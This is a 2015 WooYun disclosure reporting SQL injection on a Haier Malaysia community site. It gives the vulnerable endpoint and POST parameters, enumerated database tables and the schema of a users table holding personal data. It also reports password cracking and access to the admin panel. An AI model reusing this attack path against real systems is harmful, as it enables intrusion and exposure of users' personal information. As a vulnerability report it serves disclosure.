当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136059

漏洞标题:海尔集团某站SQL注入漏洞直捣后台(泄露用户敏感信息/地址邮箱手机姓名等)

相关厂商:海尔集团

漏洞作者: M4sk

提交时间:2015-08-23 14:12

修复时间:2015-08-28 14:14

公开时间:2015-08-28 14:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-23: 细节已通知厂商并且等待厂商处理中
2015-08-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

POST注入啦
url "http://mycommunity.haier.com.my/home/submitform_quize"
data "question_id=111&question_textarea=111&user_id=0"

1.png


Database: haiersocial
[30 tables]
+----------------------+
| answer |
| banners |
| categories |
| events |
| faq |
| fb_info |
| gallery |
| gallery_pic |
| log_download |
| log_view |
| news_category |
| news_product |
| product_comment |
| product_review |
| products |
| promotion_products |
| purchases |
| quiz |
| quiz_user_answer |
| record_user |
| shipping |
| tag_faq_cat |
| tag_prod_user_rating |
| tag_product_banner |
| tag_user_rate |
| users |
| video_gallery |
| video_gallery_video |
| video_hub |
| winner |
+----------------------+


Database: haiersocial
Table: users
[27 columns]
+-------------------+--------------+
| Column | Type |
+-------------------+--------------+
| accomodate | varchar(50) |
| address | varchar(255) |
| city | varchar(180) |
| country | varchar(180) |
| created | datetime |
| email | varchar(255) |
| enable | tinyint(1) |
| fb_id | bigint(20) |
| fname | varchar(255) |
| house_income | char(50) |
| ic_no | varchar(180) |
| id | bigint(20) |
| image | varchar(255) |
| industry | varchar(180) |
| invited_friends | tinyint(1) |
| is_like | tinyint(1) |
| lname | varchar(255) |
| login_date | datetime |
| logout_date | datetime |
| marital_state | tinyint(1) |
| name | varchar(255) |
| postcode | char(50) |
| purchased_product | tinyint(1) |
| race | char(50) |
| state | varchar(180) |
| tel | char(50) |
| term_of_use | tinyint(1) |
+-------------------+--------------+


可以看出泄露用户各种信息 国家 地址 城市 邮箱 手机 姓名 电话等等...

2.png


下一步来跑密码啦~

3.png


4.png


http://mycommunity.haier.com.my/admin/products
值捣后台

5.png


后台功能都可以操作
求不小厂商~

漏洞证明:

综上

修复方案:

你会

版权声明:转载请注明来源 M4sk@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-28 14:14

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2015-08-23 19:52 | Me_Fortune ( 普通白帽子 | Rank:209 漏洞数:71 | I'm Me_Fortune)

    你这个标题都格式化了,今天不讲段子我很难过

  2. 2015-08-23 21:43 | M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)

    @Me_Fortune 今天忘记写段子了 ╮(╯▽╰)╭